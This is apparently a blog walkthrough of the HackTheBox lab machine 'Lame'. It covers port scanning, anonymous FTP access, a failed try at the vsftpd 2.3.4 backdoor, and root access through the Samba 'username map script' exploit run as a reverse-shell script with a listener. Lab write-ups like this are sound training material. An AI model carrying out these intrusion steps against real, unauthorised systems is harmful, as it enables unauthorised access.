HackTheBox: Lame
Walk-through
Hey guys, this time I’ll root Lame from Hackthebox which is a rated as Easy Linux machine.
Without a further ado, let’s exploit.
Initials:
export IP=10.129.99.7port scanning
rustscan -a $IP --ulimit 5000 | ports.txtGot three open ports i.e., 21 (ftp), 22 (ssh), 139 (samba)
nmap
nmap -sC -sV -p21,22,139 -oN namp $IP -Pn
Exploit
FTP
I found that anonymous login allowed in FTP, so I logged in in ftp service
ftp $IPbut there was no files.
Later I checked for the vsftpd 2.3.4 exploit and found one Exploit named “backdoor”. I used Metasploit and other scripts but failed to get a session/shell.
Later I found in module description
This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011.
Samba
Since FTP exploit didn’t work and I don’t have ssh credentials, I went for samba. There was one writable share name tmp whose some files are not accessible.
Found the exploit for samba named “username map script” command execution
I got the exploit script from GitHub and modified the payload (and added some tweaks XD).
Syntax for the script was
./username.py <rhosts> <rport> <lhost> <lport>→ Start the listener
→ ran the script
and got the shell as root. There was no need for PrivEsc (:
Proof
Outro
That’s all for this machine, we’ll meet in next blog. Till than, Happy Hacking o7
